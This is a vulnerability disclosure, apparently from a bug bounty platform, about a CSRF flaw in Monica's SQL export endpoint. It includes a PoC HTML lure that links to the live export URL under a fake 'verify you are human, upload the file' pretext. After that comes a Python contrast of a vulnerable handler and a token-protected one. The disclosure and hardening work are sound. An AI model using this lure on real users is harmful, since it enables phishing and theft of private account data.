Cross-Site Request Forgery (CSRF) in monicahq/monica

Valid

Reported on

Jun 3rd 2021


✍️ Description

The /settings/exportToSql endpoint has no CSRF protection: a plain GET request carrying the victim's session cookie is enough to trigger an export of the whole account's data, so any page the logged-in user visits can make their browser download that export (a link is sufficient, and a top-level navigation sends the session cookie even with SameSite=Lax). Combined with social engineering, this can be used to trick the user into handing the exported file to an attacker.

🕵️‍♂️ Proof of Concept

Log in to a user account. Save the following file and open it in the same browser.

// PoC.html
<!DOCTYPE html>
<html>
<body>
        <!-- Pretext that makes the victim click the link and keep the downloaded file. -->
        To verify that you are a human, upload the file that has been downloaded from our website now.
        <!-- A cross-site link is enough: the click is a top-level GET navigation, so the
             browser attaches the victim's session cookie and the export is served. -->
        <a href="https://app.monicahq.com/settings/exportToSql">Download Test File</a>
</body>
</html>

Clicking the link downloads the user's data from the application without any confirmation or token check. The attacker then relies on social engineering to get the user to upload the downloaded file to an attacker-controlled server.
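The following is an added illustration, not the project's code and not what commit cefeb9 changed (Monica is a PHP/Laravel application; the fix itself is not shown on this page). It contrasts the vulnerable pattern the report describes, an export served on any GET, with a hardened handler that accepts only a POST carrying a session-bound synchronizer token and checks the Origin/Referer as defence in depth. The request and session objects, the origin https://app.monicahq.com and the attacker URLs are constructed assumptions; the 419 status follows Laravel's convention for a token mismatch.

```python
from __future__ import annotations

import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Assumption: the deployed origin of the target application.
SITE_ORIGIN = "https://app.monicahq.com"
EXPORT_PATH = "/settings/exportToSql"


@dataclass
class Session:
    """Server-side session; the CSRF token is generated once per session."""
    user_id: int
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Minimal stand-in for an HTTP request carrying the user's session cookie."""
    method: str
    path: str
    headers: dict[str, str]
    form: dict[str, str]
    session: Session


def export_to_sql_vulnerable(req: Request) -> tuple[int, str]:
    """Pattern described in the report: a GET with a valid session cookie is
    all it takes, so the PoC's plain <a href> link triggers the export."""
    if req.path != EXPORT_PATH:
        return 404, "not found"
    return 200, f"-- SQL dump for user {req.session.user_id}"


def csrf_token_ok(req: Request) -> bool:
    """Synchronizer token: the form field must equal the session's token.
    Constant-time comparison avoids leaking the token byte by byte."""
    submitted = req.form.get("_token", "")
    return bool(submitted) and hmac.compare_digest(submitted, req.session.csrf_token)


def origin_ok(req: Request) -> bool:
    """Defence in depth: Origin (or, failing that, Referer) must be our own
    origin. Requests that carry neither header are rejected."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return False
    parts = urlsplit(src)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def export_to_sql_hardened(req: Request) -> tuple[int, str]:
    """Export only on a POST that carries the session's token and comes from
    our own origin. 419 is the status Laravel uses for a token mismatch."""
    if req.path != EXPORT_PATH:
        return 404, "not found"
    if req.method != "POST":
        return 405, "method not allowed"      # the PoC link's GET stops here
    if not csrf_token_ok(req):
        return 419, "CSRF token mismatch"
    if not origin_ok(req):
        return 403, "cross-site request rejected"
    return 200, f"-- SQL dump for user {req.session.user_id}"


# Constructed requests modelling three cases (not captured traffic).
def poc_link_click(session: Session) -> Request:
    """The victim clicks the link in PoC.html: a top-level GET navigation.
    Browsers attach the session cookie to it even with SameSite=Lax."""
    return Request("GET", EXPORT_PATH,
                   {"Referer": "https://attacker.example/PoC.html"}, {}, session)


def legitimate_form_post(session: Session) -> Request:
    """The settings page's own form: POST with the token embedded in it."""
    return Request("POST", EXPORT_PATH, {"Origin": SITE_ORIGIN},
                   {"_token": session.csrf_token}, session)


def cross_site_form_post(session: Session) -> Request:
    """Attacker-hosted auto-submitting form: right method, but it cannot
    know the victim's token (the same-origin policy keeps it out of reach)."""
    return Request("POST", EXPORT_PATH, {"Origin": "https://attacker.example"},
                   {"_token": "guessed"}, session)


if __name__ == "__main__":
    s = Session(user_id=7)
    for name, req in [("PoC link", poc_link_click(s)),
                      ("legitimate form", legitimate_form_post(s)),
                      ("cross-site form", cross_site_form_post(s))]:
        print(f"{name:16} vulnerable={export_to_sql_vulnerable(req)[0]} "
              f"hardened={export_to_sql_hardened(req)[0]}")
```

The method check alone defeats the link in PoC.html, because Laravel's CSRF middleware (like the hardened handler here) only inspects non-read methods; moving a sensitive action off GET is therefore the first step, and the token is what stops an attacker-hosted auto-submitting form from doing the same thing with a POST.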

💥 Impact

Leakage of private account data: because the export endpoint has no CSRF token, a phishing page can trigger the download, and social engineering can then move the exported file to the attacker.

Yadhu Krishna M
2 years ago

wow

Alexis Saettler validated this vulnerability 2 years ago
Oomb has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alexis Saettler marked this as fixed with commit cefeb9 2 years ago
Alexis Saettler has been awarded the fix bounty
This vulnerability will not receive a CVE